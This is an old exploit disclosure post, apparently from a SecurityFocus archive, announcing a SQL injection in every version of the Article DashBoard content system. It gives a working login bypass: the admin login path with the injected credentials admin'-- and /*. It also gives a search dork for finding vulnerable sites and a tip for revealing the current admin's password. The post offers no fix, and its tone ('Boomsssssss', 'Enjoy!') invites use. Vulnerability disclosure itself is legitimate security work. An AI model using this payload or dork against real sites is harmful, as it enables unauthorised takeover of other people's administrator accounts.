Article DashBoard all version SQL Injection Vulnerability Jan 15 2008 01:36PM
xcross87 gmail com
########################################################################
##

# ArticleDashBoard all version SQL Injection Vulnerability #

# Homepage: http://articledashboard.com/ #

# Download: http://www.articledashboard.com/addxpc/ArticleDashboard.zip #

# SQL Injection Found by : #

# ^ Xcross87 | xcross87.info | hcegroup.net #

# Thanks to: ^ RongChauA | reaonline.net | rongchaua.net #

# Dork : Powered by Article DashBoard #

########################################################################
##

SQL Injection Vulnerability :

Link admin: http://www.victim.com/[path]/admin/login.php

user | pass = admin'-- | /*

Boomsssssss ! Top right corner.." Logged in as 'admin' "

Note:

+ This source all is encrypted !

+ If admin setup mode: 'New Admin' , move mouse to the New Admin link you can see the password of the present admin account that you're logging in.

[^$^] Enjoy !

=============================

# - by Xcross87 | rongchaua #

=============================

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus